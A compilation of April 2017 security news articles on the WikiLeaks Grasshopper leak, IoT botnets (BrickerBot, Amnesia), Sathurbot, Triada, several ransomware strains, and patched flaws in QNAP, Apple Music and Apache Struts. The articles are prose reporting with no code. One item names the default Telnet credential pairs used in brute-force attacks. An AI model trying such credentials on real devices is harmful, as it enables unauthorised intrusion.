According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."
"Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such malware is "Carberp," which is a malware rootkit developed by Russian hackers.
"The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."
Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.


BrickerBot Damages IoT Device Firmware

8.4.2017 securityweek IoT

Security researchers have identified a new type of cyber attack causes damage to Internet of Things (IoT) devices, rather than ensnaring them into a botnet.

Dubbed Permanent Denial-of-Service (PDoS), the attacks can be highly damaging, resulting in the need to replace or reinstall hardware, researchers explain: security flaws are abused to destroy the firmware and/or basic functions of system.

One of the tools used to launch such attacks is called BrickerBot, and Radware researchers observed two variants starting March 20, 2017. One of them, however, had a short life and remains inactive, while the other continues to operate. Both, however, have had the same purpose: to compromise IoT devices and corrupt their storage.

Both bots started PDoS attempts on the same date and they were discovered within one hour of each other. However, while the first showed intense activity over its short life, the second displayed lower intensity, but has been more thorough in its attacks and has been also concealing its location using TOR (The Onion Router) egress nodes.

To compromise devices, BrickerBot uses Telnet brute force, a method previously associated with the Mirai botnet, which abused infected devices to launch distributed denial of service (DDoS) attacks.

Once it has successfully accessed a device, the PDoS bot performs a series of Linux commands meant to ultimately corrupt storage. Next, it also attempts to disrupt Internet connectivity and device performance, and to wipe all files on the device.

“Among the special devices targeted are /dev/mtd (Memory Technology Device - a special device type to match flash characteristics) and /dev/mmc (MultiMediaCard - a special device type that matches memory card standard, a solid-state storage medium),” Radware researchers reveal.

The attack is targeted specifically at Linux/BusyBox-based IoT devices that have the Telnet port open and exposed publically on the Internet. These are the same type of devices that Mirai and related IoT botnets have been targeting.

The recorded PDoS attempts originated from a limited number of IP addresses worldwide, with all devices exposing port 22 (SSH) and running an older version of the Dropbear SSH server. These were identified as Ubiquiti network devices.

The security researchers also identified a second type of PDoS attempts, with a different command signature, which hid their source IP addresses behind TOR nodes. Still ongoing, these attacks attempt to brute-force the Telnet login using the root/root and root/vizxv username-password pairs, use more thorough commands, and target a much broader range of storage devices.

These attacks don’t use 'busybox' but attempt both 'dd' and 'cat,’ whichever is available on the breached device, the researchers say. In the end, these attacks also attempt to remove the default gateway, wipe devices, and disable TCP timestamps. With the help of extra commands, the attackers attempt to flush all iptables firewall and NAT rules and add a rule to drop all outgoing packets.


WikiLeaks leaked files on the Grasshopper framework, a CIA Tool for creating customized malware installers
8.4.2017 securityaffairs BigBrothers 

Wikileaks published a new batch of 27 documents detailing the Grasshopper framework used by its agents to create custom installers for Windows malware.
WikiLeaks continues to disclose documents included in the CIA Vault 7 archive, on Friday published a new batch of 27 documents detailing a framework, dubbed Grasshopper, allegedly used to create custom installers for Windows malware.

The Grasshopper framework allows CIA operators to build a custom payload, run it and analyzed the results of the execution.

The leaked documents compose a user guide classified as “secret” that was available to the CIA cyber spies.

“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.

CIA Grasshopper framework

The dropper described in the Grasshopper manual should be loaded and executed only in memory, the framework allows creating custom malware that is able to compromise the target system bypassing the antivirus it is using.

“A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,” reads the manual. “Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.”

Each executable generated with the Grasshopper framework contains one or more installers.

The framework offers to the operators various persistence mechanisms that can define a series of rules that need to be met before an installation is launched. The rules allow attackers to target specific systems specifying its technical details (i.e. x64 or x32 architecture, OS).

“An executable may have a global rule that will be evaluated before execution of any installers. If a global rule is provided and evaluates to false the executable aborts operation” continues the manual.

One of the persistence mechanisms reported in the user guide is called Stolen Goods, basically, the CIA exploited the mechanisms implemented by the malicious codes used by crooks in the wild.

For example, the CIA has modified some components of the popular Carberp rootkit.

“The persistence method and parts of the installer were taken and modified to fit our needs,” reads a leaked document. “A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.”

Another persistence mechanism leverages the Windows Update Service to allow the execution of the payload on every system boot or every 22 hours, this technique uses a series of DLLs specified in the registry.

WikiLeaks has already leaked the “Year Zero” batch which contains detailed info on the CIA hacking exploits and the “Dark Matter” batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs. A few days ago, WikiLeaks published the third batch called “Marble,” a collection of files describing the CIA anti-forensics tool dubbed Marble framework.


Sathurbot Botnet Targets WordPress Accounts

8.4.2017 securityweek BotNet
A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.

Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.

Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.

Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.

“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.

The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.

Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results in used to harvest domain names.

The threat selects only the domains that are created using WordPress, but it appears that the threat is also interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.

The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.

“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.

The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.

“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.

Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.


WikiLeaks Details CIA Tool for Creating Windows Malware Installers

8.4.2017 securityweek BigBrothers
WikiLeaks leaks more alleged CIA hacking tools

WikiLeaks on Friday published 27 documents detailing a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to create custom installers for malware designed to target Windows systems.

The framework, dubbed “Grasshopper,” has been described as a tool that allows operators to build a custom installation executable, run that executable, and evaluate the results of the execution. The Grasshopper user guide specifies that the dropper should be loaded and executed only in memory.

Leaked documents show that Grasshopper provides various persistence mechanisms and allows users to define a series of conditions that need to be met before an installation is launched. These rules can help determine if the targeted device is running the correct version of Windows and if certain security products are present.

One of the persistence mechanisms highlighted by WikiLeaks involves the Windows Update Service, which can be abused to ensure that the payload is executed on every system boot or every 22 hours, when the service loads a series of DLLs specified in the registry.

WikiLeaks also highlighted Stolen Goods, a Grasshopper persistence module that borrows code from the notorious Carberp banking Trojan, whose source code was leaked a few years ago. The authors of Stolen Goods, however, pointed out that only some parts of the Carberp code were taken and those were heavily modified.

“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.

This is the third round of files made public by WikiLeaks as part of the dump called Vault 7. The organization claims to possess numerous exploits allegedly used by the CIA and it has offered to share them with affected tech companies, but it appears that many firms are not willing to comply with WikiLeaks’ demands to obtain the information.

An analysis of the information made public to date has shown that many of the vulnerabilities have already been patched by security firms and tech giants such as Apple and Google. Cisco did admit finding a critical vulnerability affecting many of its switches following an analysis of the Vault 7 files.


Android Trojan Uses Sandbox to Evade Detection

8.4.2017 securityweek Android
The Triada malware, said last year to be the most advanced mobile threat, recently boosted its detection evasion capabilities with the adoption of sandbox technology, Avast security researchers reveal.

Detailed for the first time in March last year, the malware was observed leveraging the Zygote process to hook all applications on a device. Featuring a modular architecture, the Trojan was mainly designed to redirect financial SMS transactions to buy additional content or steal money from the user.

Recently, Triada started using the open source sandbox DroidPlugin, which is designed to dynamically load and run an app without actually installing it. With the help of this sandbox, Triada loads malicious APK plugins, thus running them without having to install them on the device. Because of this practice, anti-virus solutions have a hard time detecting the malware, because its malicious components are not stored in the host app.

The malware is being distributed with the help of social engineering tactics, by deceiving victims into downloading the malware. Once installed, the threat hides its icon from the phone’s desktop and starts stealing personal information in the background, without ever alerting the victim.

While the earliest variant of the malware didn’t use DroidPlugin, a new variant that emerged in November started integrating it, Avast researchers explain. Around the same time the new Triada variant emerged, the malware author reportedly submitted an issue to DroidPlugin to report an out-of-memory bug.

According to Avast, the malware disguises itself as Wandoujia, a famous Android app store in China. Furthermore, it was observed hiding all of its malicious APK plugins in the asset directory, for DroidPlugin to run.

“Each of these plugins has its own dedicated malicious action to spy on the victim, including file stealing, radio monitoring, and more. One of the plugins communicates with a remote command and control (C&C) server, which instructs which activities should be carried out. These are then carried out by the other APKs,” the researchers say.

Avast also explains that the malware developer didn’t integrate the malicious plugins into an application, but instead opted for the use of DroidPlugin sandbox to dynamically load and run them specifically to bypass antivirus detections. The host application doesn’t include malicious actions, and antivirus solution won’t detect and blog the host app.

Only a couple of cases of malware using sandboxes for their nefarious purposes have been observed so far, but more instances might emerge. “While it can be convenient to use a sandbox to run an app without installing it, sandboxes can also be used maliciously by malware,” Avast concludes.


Joke "rensenWare" Ransomware Challenges Gamers

8.4.2017 securityweek Virus
Researchers have discovered a strange new ransomware called 'rensenWare'. Rather than demanding money for decryption, it requires the victim to score "over 0.2 billion" playing "TH12 -- Undefined Fantastic Object". Victims are told that the score will be monitored, and decryption will be automatic on success, provided there is no attempt to cheat.

Analysis by Lawrence Abrams subsequently concluded that rensenWare is not effectively coded for it to be serious ransomware. "As the developer is not looking to generate revenue from this ransomware," he concluded, "this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed."

This seems to have been confirmed by the author, Tvple Eraser on Twitter: "Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day". rensenWare seems to have been a bit of fun by a gamer/hacker, and that's all.

That seems to be the feeling of the security industry. "Never say never, but I don't think we'll see much copycat efforts spawning from rensenware," Sean Sullivan, Security Advisor at F-Secure told SecurityWeek. Nevertheless, he added, "There was some interesting 'Kirk' ransomware the other week (and Spock was the cure). So I think we'll see continued amounts of 'creative' themes, but they'll be asking for Bitcoin, not high scores."

But hard-core gaming has its own sub-culture. SecurityWeek approached two hard-cores. One responded, "Oh, yes, most definitely this will provoke some copycat jokes and viruses." This is worth watching, because 'vendettas' among gamers are not unknown.

The other added, "In retrospect, I'm surprised no-one has done a ransomware like this already." He added that there's not much 'buzz' on the gaming scene yet, possibly because it's so new; but continued "I'd say there's a reasonable chance of it sparking a new 'subgenre' of ransomware viruses (challengeware?) and I can even see a toned-down version of it being used in viral marketing campaigns."

Right now, the basic concept developed by Tvple Eraser is not a threat -- but it has the potential to become one, or at last a nuisance. In fact, it could already be described as a nuisance. Googling 'rensenware' will generate a string of websites providing information on a threat that arguably does not exist, but all offering to remove it (and other ransomware/viruses) with a simple download.

That download is invariably SpyHunter. SpyHunter used to thought of as 'rogueware'. It has fought this description vigorously, including in the courts. It has sued both BleepingComputer after a poor review, and Malwarebytes for classifying it as a PUP (potentially unwanted program). SecurityWeek asked Malwarebytes if it still treats SpyHunter as a PUP.

"Enigma's SpyHunter?" replied malware intelligence researcher Pieter Arntz; "Yes, definitely."


Vulnerability in Apple Music for Android could be exploited to steal user data
7.4.2017 securityaffairs Apple

Apple fixed a vulnerability tracked as CVE-2017-2387 in the Apple Music for Android that could allow attackers to launch MitM attacks on the application.
The update released Apple for the Apple Music application for Android fixes a certificate validation issue that can be exploited by an attacker to run MitM attacks and intercept user data.

The Apple Music for Android version 2.0 also implements new features and fixes the above vulnerability tracked as CVE-2017-2387.

According to Google Play, the version 2.0 of Apple Music for Android has between 10 and 50 million installs.

The flaw CVE-2017-2387 was discovered by David Coomber of Info-Sec.CA in August 2016. The vulnerability was affecting Apple Music 1.2.1 and earlier versions of the Android app.

Apple Music for Android

“The Apple Music Android application (version 1.2.1 and below), does not validate the SSL certificates it receives when connecting to the mobile application login and payment servers.” reads the security advisory published by Coomber.

“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently. Sensitive information could be captured by an attacker without the user’s knowledge.”

According to the expert, the app did not validate the SSL certificates presented while connecting to the login and payment servers. The attacker can present a forged SSL certificate that will be accepted by the application without raising any alert.

“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user’s knowledge.”

Unfortunately, such kind of issues is quite common for mobile applications and represent a serious threat to the user privacy.


Philadelphia Ransomware, a new threat targets the Healthcare Industry
7.4.2017 securityaffairs Virus

“Philadelphia” Ransomware Targets Healthcare Industry
Security experts from Forcepoint have discovered a new strain of ransomware dubbed Philadelphia that is targeting organizations in the healthcare industry.

The Philadelphia ransomware is a variant of the Stampado ransomware, a very cheap malware offered for sale on the Dark Web since June 2016 at just 39 USD for a lifetime license.

Last month the popular expert Brian Krebs discovered on YouTube an ad Philadelphia.

According to the researchers, thePhiladelphia ransomware is distributed via spear-phishing emails sent to the hospitals. The messages contain a shortened URL that points to a personal storage site that serves a weaponized DOCX file containing the targeted healthcare organization’s logo.

The file includes three document icons apparently related to patient information, and attempt to trick victims to click on them.

Philadelphia ransomware

If the victims click on the icon, a Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.

This tactic was already used to infect a hospital from Oregon and Southwest Washington.

“However, it appears that amateur cybercriminals have also started to shift towards this trend in the form of an off-the-shelf ransomware aimed at a healthcare organization in the United States.” reads the analysis published by ForcePoint.

“In this attack, a shortened URL, which we believe was sent through a spear-phishing email, was used as a lure to infect a hospital from Oregon and Southwest Washington. Once a user clicks on the link, the site redirects to a personal storage site to download a malicious DOCX file. This document contains the targeted healthcare organization’s logo and a signature of a medical practitioner from that organization as bait.”

“three document icons pertaining to patient information are present in the file. These icons all point to a malicious JavaScript” “Once the user double-clicks any of the icons, the Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.”

Philadelphia ransomware

Once the ransomware infected the system it contacts the C&C server and sends various details on the target machine, including operating system, username, country, and system language. The C&C server responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

The Philadelphia ransomware used AES-256 to encrypt the files, when the operation is completed it displays a request for 0.3 Bitcoins ransom to the victims.

The analysis of the malicious code revealed a couple of interesting things:

the encrypted JavaScript contained a string “hospitalspam” in its directory path.
the ransomware C&C also contained “hospital/spam” in its path.
The presence of the words suggests the attackers are specifically targeting hospitals using spear phishing emails.

“Ransomware-as-a-service (RaaS) platforms such as Philadelphia continue to attract would-be cybercriminals to take part in the ransomware business” concluded Forcepoint. “Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,”


IoT Amnesia Botnet puts at risk hundreds of thousands of DVRs due to unpatched flaw
7.4.2017 securityaffairs IoT

Security experts at Palo Alto Networks have discovered a new Linux/IoT botnet dubbed Amnesia botnet that has been targeting digital video recorders (DVRs).
Amnesia exploited an unpatched remote code execution vulnerability that was disclosed more than one year ago by security researcher Rotem Kerner.

“fraudsters are adopting new tactics in order to attack retailers. This new attack vector is to compromise DVR boxes, which is the heart component of any CCTV system. This was allowing them to achieve two goals at once-

Verify a targeted host actually belongs to a retailer.
Get a foothold inside the local network, one step closer to the POS station.
” wrote Kerner.

Kerner reported the flaw in March 2016, but after a year opted to publicly reveal his discovery because the vendor ignored him.

According to Palo Alto Networks, the Amnesia is a variant of the Tsunami botnet that is a downloader/IRC Bot backdoor used in the criminal ecosystem to launch DDoS attacks. The Amnesia botnet targets embedded systems, particularly DVRs manufactured by the Chinese TVT Digital that is currently sold under more than 70 brands worldwide.

The security vulnerability discovered by the researcher is still unpatched and according to the results of an Internet scan conducted by Palo Alto Networks, there are roughly 227,000 vulnerable DVR devices in worldwide.

“Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed.” states the analysis published by PaloAlto Networks.

Amnesia botnet

The Amnesia botnet was built exploiting the remote code execution vulnerability that allowed the attackers to take complete control of the devices.

A different analysis conducted with the Censys search engine revealed more than 700,000 IP addresses.

“Additionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on Internet that are likely produced by TVT Digital. We also searched the keyword on Shodan.io and on Censys.io. They reported about 50,000 and about 705,000 IP addresses respectively.” states PaloAlto Networks.

1. Taiwan 47170
2. United States 44179
3. Israel 23355
4. Turkey 11780
5. India 9796
6. Malaysia 9178
7. Mexico 7868
8. Italy 7439
9. Vietnam 6736
10. United Kingdom 4402
11. Russia 3571
12. Hungary 3529
13. France 3165
14. Bulgaria 3040
15. Romania 2783
16. Colombia 2616
17. Egypt 2541
18. Canada 2491
19. Iran 1965
20. Argentina 1748
Experts believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to elude malware analysis sandboxes.

“Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system.” continues the analysis. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”

Experts at PaloAlto believe the Amnesia botnet has the potential to become one of the major botnets in the threat landscape and would be used for large-scale attacks.

For further information on Amnesia give a look at the technical report that also includes IoCs.


Critical Vulnerabilities Patched in QNAP Storage Devices

7.4.2017 securityweek Vulnerebility
QNAP recently patched roughly 20 vulnerabilities in its network-attached storage (NAS) products, including weaknesses that can be exploited to take control of affected devices.

According to an advisory published by the vendor last month, the flaws were patched with the release of version 4.2.4 build 20170313 of QTS, the operating system running on QNAP NAS devices.

The update patches privilege escalation, command injection, SQL injection, cross-site scripting (XSS), clickjacking, credentials management, access bypass and various memory corruption vulnerabilities.

Three of the command injection flaws were reported to QNAP by Harry Sintonen of F-Secure, who on Thursday published an advisory detailing his findings. The expert said he informed the vendor of the vulnerabilities in late February.

The security holes discovered by Sintonen, tracked as CVE-2017-6361, CVE-2017-6360 and CVE-2017-6359, can be exploited by authenticated or unauthenticated attackers to execute arbitrary commands on vulnerable devices. Exploitation of the unauthenticated command injection flaws can be automated in attacks aimed at devices that are connected to the Internet.

According to Sintonen, the flaws allow an attacker to gain root access to a device and read or modify all the data stored on it.

Researchers Pasquale Fiorillo and Guido Oricchio also published an advisory detailing a privilege escalation vulnerability (CVE-2017-5227) that was patched with the release of QTS 4.2.4.

The experts discovered that a local user can access a configuration file that contains a poorly encrypted Windows domain administrator password. The password is stored in the configuration file if the NAS device has joined an Active Directory domain, researchers said.

A couple of researchers from Salesforce have also been credited for finding security holes patched in QTS 4.2.4. The flaws found by Fiorillo, Oricchio and Sintonen are the only ones that have been assigned CVE identifiers.

It’s important that users install the update as soon as possible since malware that specifically targets QNAP devices is not unheard of. A few years ago, researchers warned that a worm had been exploiting the ShellShock vulnerability to plant backdoors on NAS devices from QNAP.


China-Linked Hackers Target U.S. Trade Group

7.4.2017 securityweek Cyber
A threat actor linked to China hijacked the website of a prominent U.S. trade association in an effort to deliver reconnaissance malware to individuals who accessed certain web pages.

Fidelis Cybersecurity published a report detailing the campaign on Thursday, just hours before a meeting between U.S. President Donald Trump and his Chinese counterpart, Xi Jinping.

The company noticed in late February that the website of the National Foreign Trade Council (NFTC) had been hacked and set up to serve malware in what is known as a watering hole attack, or a strategic web compromise. Experts believe the attack ended by March 2, when links injected into the NFTC website had been removed.

Evidence uncovered by investigators led them to believe that the attack was conducted by a China-linked cyber espionage group known as APT10, MenuPass and Stone Panda. Fidelis has dubbed the campaign Operation TradeSecret.

According to researchers, the hackers set up certain web pages of the NFTC website to serve a reconnaissance framework known as Scanbox. The tool has been used for several years, including in attacks aimed at U.S. organizations and the Uyghur population in China.

Scanbox has various plugins that allow attackers to collect information about the infected system and the software installed on it, and log keystrokes from the web browser. The harvested data can then be used to launch further attacks against the targeted individuals.

In the case of the NFTC, whose board of directors includes some of the largest private sector companies in the United States, APT10 targeted only specific web pages. One of them was a registration page for a board of directors meeting, which suggests that people or organizations expected to attend the meeting had been targeted.

“All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report,” warned Fidelis. “Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.”

The security firm said it notified the lobbying group of the breach. SecurityWeek has reached out to NFTC for comment and will update this article if the organization responds.

Fidelis also reported seeing a similar campaign involving a fake website of Japan’s Ministry of Foreign Affairs. The APT10 attacks targeting Japan were also detailed in a report published this week by PwC UK and BAE Systems.

The research conducted by the two companies focused on attacks launched by APT10 against managed service providers (MSPs) in at least fourteen countries.


European Parliament Slams Privacy Shield

7.4.2017 securityweek Privacy
The European Parliament on Thursday adopted a resolution (PDF) strongly criticizing the EU-US Privacy Shield. Privacy Shield is the mechanism jointly developed by the European Commission and the US government to replace the earlier Safe Harbor, struck down by the European Court of Justice in 2015. Its purpose is to allow the transfer of EU personal information from Europe to servers in the US.

European law requires that personal information can only be transferred to geographical locations with an equivalent or 'adequate' level of privacy protection. With very different attitudes towards privacy between the US and the EU, it is unlikely that US data protection will ever be considered adequate for EU data. Privacy Shield is designed to provide an agreement between individual US organizations and the EU that they will handle EU data in a manner acceptable to European standards.

Although Privacy Shield has been agreed between the EC and the US and is already in operation it is not without its critics-- not the least of which is the European Parliament. The stakes are high. While this is not the only legal mechanism for the export of European data to the US, it is the primary one. Others include standard contractual clauses (SCCs); but SCCs are already being challenged by Max Schrems in the Irish High Court. Without an acceptable lawful mechanism, there can be no trade between the US and the EU.

It is generally considered that SCCs will eventually be declared unlawful. "There is the ongoing case in Ireland regarding Standard Contractual Clauses," European privacy consultant Alexander Hanff told SecurityWeek. "This is likely to reach the CJEU and be ruled on in a similar fashion to Safe Harbor which, although will not have a direct impact on Privacy Shield, quite clearly shows the result similar cases (including Binding Corporate Rules and Privacy Shield itself) are likely to achieve."

There is therefore a lot riding on the continuing legality of Privacy Shield. For the moment, this is not as immediately concerning as it may seem. "The EP resolution follows the statement earlier this week from the Commission indicating a review in the Fall," comments David Flint, a senior partner at the MacRoberts law firm. "At this stage, it is merely a reminder of all the matters that the Commission should take account of and noting the residual powers of national DPAs to ban transfers, whilst restating the EP's concerns."

Hanff agrees that there will be little immediate outcome from this resolution. "I am pretty sure that the Commission can ignore the motion and are likely to do so because frankly what other choice do they have at the moment -- if they agree to it, then they are basically accepting that they failed, and the Commission are really not that humble." Politically, he sees a rift in the current Commission between those focused on digital rights and those focused on the Digital Economy; with the latter in the ascendency.

This doesn't mean that there is not a problem. Individual national data protection authorities (DPAs) "do have the power to effectively shut down Privacy Shield by banning transfers based on it on the grounds that it does not meet adequacy requirements," continued Hanff. "They have not done so to date -- I suspect because they have been giving the Commission and the US Government a chance to fix it -- but it seems highly unlikely that that will ever happen."

Hanff notes that there is little actual progress on the Privacy Shield agreement from the US side. "When you consider there is still no Ombudsman and that the Privacy and Civil Liberties Oversight Board is reduced to a non-quorate position where only one of its five seats are currently occupied... even if you completely ignore the woeful inadequacies of the agreement, you cannot ignore that some of the major assurances of that agreement have quite simply not been met. I suspect it is only a matter of time now before one or more of the EU's DPAs makes a stand." The French authority, CNIL, has demonstrated that it would not be afraid to do so, with recent actions against both Google and Microsoft.

One further complication is a hardening of attitudes with the arrival of the Trump administration. "There is no detailed consideration of possible changes as a result of the new US administration, although that remains a significant concern," comments Flint. "The recent policy changes on net neutrality and ISP data sharing exacerbate the concern."

Hanff is more forthright. "One should also be asking questions with regards to the Trump administration and US Congress wiping out ISP privacy rules last week. One must understand that whereas many people focus on the transference of data to a third country when they discuss Privacy Shield (in the case of Privacy Shield, specifically the US) it is not just about the right to transfer; it stems from the right to process - so we must now consider whether a European Citizen visiting the US and using a US carrier for data and voice, have their rights undermined by these recent changes. The obvious answer is yes; however, how we deal with that is much less obvious."

The European Commission is caught in a modern Morten's Fork of its own making. It was instrumental in developing European data protection laws (for human rights reasons), but doesn't wish to abide by them (for economic reasons). Much will hinge on the EC-US talks in the Fall; but today's European Parliament resolution has indicated to the EC what it expects.

If there is no significant move by the US administration to satisfy European concerns, then a rapid legal challenge to the Privacy Shield can be expected. But it should also be noted that the national DPAs do not have to wait for a legal judgment before taking action. The Schrems case that brought down the original Safe Harbor also made it clear that DPAs cannot be bound by EC promulgations. They have, as Hanff notes, "the power to effectively shut down Privacy Shield by banning transfers based on it, on the grounds that it does not meet adequacy requirements."


IoT Botnet "Amnesia" Hijacks DVRs via Unpatched Flaw

7.4.2017 securityweek IoT
A new Linux/IoT botnet named “Amnesia” has been targeting digital video recorders (DVRs) by exploiting an unpatched remote code execution vulnerability disclosed more than one year ago.

The threat, believed to be a variant of the Tsunami botnet, has been analyzed in detail by researchers at Palo Alto Networks. The botnet targets embedded systems, particularly DVRs made by China-based TVT Digital, which are sold under more than 70 brands worldwide.

The vulnerability exploited by the Amnesia malware was disclosed in March 2016 by researcher Rotem Kerner. The expert decided to make his findings public after the vendor ignored his attempts to report the flaw.

The security hole likely remains unpatched and an Internet scan conducted by Palo Alto Networks shows that there are roughly 227,000 vulnerable DVRs in the United States, Taiwan, India, Israel, Turkey, Malaysia and many other countries. A different search carried out via the Censys.io project revealed more than 700,000 IP addresses.

Amnesia has exploited the remote code execution flaw to identify vulnerable DVRs and take complete control of the devices.

Several IoT botnets emerged over the past months, including the notorious Mirai and Remaiten, which also includes capabilities borrowed from Tsunami.

What makes Amnesia interesting is the fact that it has virtual machine (VM) evasion capabilities – experts say this is the first Linux malware that attempts to evade sandboxes.

It’s not uncommon for Windows and Android malware to evade VMs, but such evasion techniques have not been seen in Linux malware.

“Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system,” explained Palo Alto Networks researchers. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”

While Amnesia has yet to be used for large-scale attacks, experts believe it does have the potential to become a major botnet that can cause significant damage.


Flaw in Apple Music for Android Exposes User Data

7.4.2017 securityweek Apple
An update released this week by Apple for the Apple Music application for Android addresses a certificate validation issue that can be exploited to intercept potentially sensitive data.

In addition to a new design and new features, version 2.0 of Apple Music for Android, which according to Google Play has between 10 and 50 million installs, patches a vulnerability that can allow a man-in-the-middle (MitM) attacker to obtain user information.

The vulnerability, tracked as CVE-2017-2387, was reported to Apple by David Coomber of Info-Sec.CA back in August 2016. At the time, the researcher determined that the flaw had affected Apple Music 1.2.1 and earlier versions of the Android app.

In an advisory published this week, Coomber said he asked Apple for a status update in January, and the company said it had still been working on addressing the security hole.

The problem, according to the researcher, was that the app did not validate the SSL certificates received when connecting to the login and payment servers.

“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user's knowledge.”

It’s worth noting that this appears to be the first security advisory released by Apple for the Music app. The Android application was introduced in November 2015.


Apache Struts 2 vulnerability exploited to deliver the Cerber ransomware
7.4.2017 securityaffairs Virus

Cyber criminals exploited the recently patched Apache Struts 2 vulnerability CVE-2017-5638 in the wild to deliver the Cerber ransomware.
A recently patched Apache Struts 2 vulnerability, tracked as CVE-2017-5638, has been exploited by crooks in the wild to deliver the Cerber ransomware.

The remote code execution vulnerability affected the Jakarta-based file upload Multipart parser under Apache Struts 2. The CVE-2017-5638 flaw was documented in Rapid7’s Metasploit Framework GitHub site and researchers at Cisco Talos discovered that attackers in the wild are exploiting a publicly available PoC code that triggers the issue.

The attackers targeted both Unix and Windows systems to establish backdoor or to infect the system with a DDoS trojan. The recent campaign spotted by researchers at F5 Networks targeted Windows machines.

Since March 20, the experts observed attacks delivering Cerber ransomware to Windows servers.

“This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit.” reads the blog post published by F5 Networks.

“The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.”

